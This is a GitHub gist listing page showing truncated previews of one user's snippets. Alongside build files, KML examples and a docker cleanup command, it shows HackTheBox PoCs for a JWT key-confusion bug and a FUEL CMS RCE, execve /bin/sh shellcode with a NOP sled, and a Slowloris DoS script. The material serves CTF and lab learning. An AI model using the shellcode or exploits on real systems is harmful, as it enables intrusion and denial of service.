Skip to content

Instantly share code, notes, and snippets.

Avatar
🤘

James Fraser wulfgarpro

🤘
View GitHub Profile
@wulfgarpro
wulfgarpro / jwt_forge.py
Last active Nov 2, 2020
HTB "Under Construction" CVE-2015-9235 PoC
View jwt_forge.py
"""
CVE-2015-9235 PoC, known as
"JWT HS/RSA key confusion vulnerability".
This PoC was used to solve the HTB challenge
"Under Construction" on HackTheBox (HTB).
USAGE:
==
Token was obtained by logging into the
@wulfgarpro
wulfgarpro / fuelpwn.py
Created Sep 29, 2020
FUEL CMS v1.4.1 CVE-2018-16763 PoC
View fuelpwn.py
"""
FUEL CMS v1.4.1 CVE-2018-16763 PoC.
This PoC was derived from: https://www.exploit-db.com/exploits/47138.
"""
import argparse
import urllib
import requests
parser = argparse.ArgumentParser('Fuel CMS v1.4 CVE-2018-16763 PoC')
View exploit.py
BUF_SIZE=112
shellcode = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f"
shellcode += "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd"
shellcode += "\x80"
NOP_SLED = "\x90" * (BUF_SIZE - len(shellcode))
#0xffffd49c
#0xffffd4ac
#0xffffd440
#0xffffd43c
View keybase.md

Keybase proof

I hereby claim:

  • I am wulfgarpro on github.
  • I am wulfgarpro (https://keybase.io/wulfgarpro) on keybase.
  • I have a public key ASC8ENkegPmPXmvdtPn9D7MLtZLEmUW4JLAErh-1Zn0p2Ao

To claim this, I am signing this object:

@wulfgarpro
wulfgarpro / slowloris.js
Last active May 23, 2017
Slowloris example against apache2 on Ubuntu 16.10 (yakkety) "2.4.18-2ubuntu4.1"
View slowloris.js
'use strict';
const net = require('net');
const maxConnections = 200; // Max connections
const host = '127.0.0.1';
const port = 80;
let connections= [];
function Connection(h, p) {
@wulfgarpro
wulfgarpro / Makefile
Last active Jan 23, 2017
makefile header dependency target
View Makefile
SRCS = a.c
depend: .depend
.depend: $(SRCS)
rm -f ./.depend
$(CC) $(CFLAGS) -MM $^ -MF ./.depend;
include .depend
@wulfgarpro
wulfgarpro / CMakeLists.txt
Last active Jul 14, 2016
Example cmake file with gtest
View CMakeLists.txt
cmake_minimum_required (VERSION 2.6)
option (test "Build all tests." ON)
project (Tutorial)
set (CMAKE_CXX_FLAGS "-g -Wall")
#add_subdirectory (src/tutorial)
# The version number.
@wulfgarpro
wulfgarpro / generate.py
Last active Feb 21, 2016
cgi script in python to generate kml LineString with LineStyle
View generate.py
#!/usr/bin/python
import random
lat_a = random.randrange(35, 40)
lon_a = random.randrange(-120, -112)
lat_b = random.randrange(35, 40)
lon_b = random.randrange(-120, -112)
kml = (
@wulfgarpro
wulfgarpro / cgi-kml.kml
Last active Feb 21, 2016
Example kml to load cgi script using NetworkLink with flyToView/refreshInterval enabled
View cgi-kml.kml
<?xml version="1.0" encoding="UTF-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2">
<Folder>
<name>Network Links</name>
<visibility>0</visibility>
<open>0</open>
<description>Network link example 1</description>
<NetworkLink>
<name>Random Placemark</name>
<visibility>0</visibility>
@wulfgarpro
wulfgarpro / docker_rm_all.sh
Created Dec 1, 2015
Single line to remove all containers from docker
View docker_rm_all.sh
docker ps -a | awk '{ print $1 }' | xargs -I {} docker rm -f {}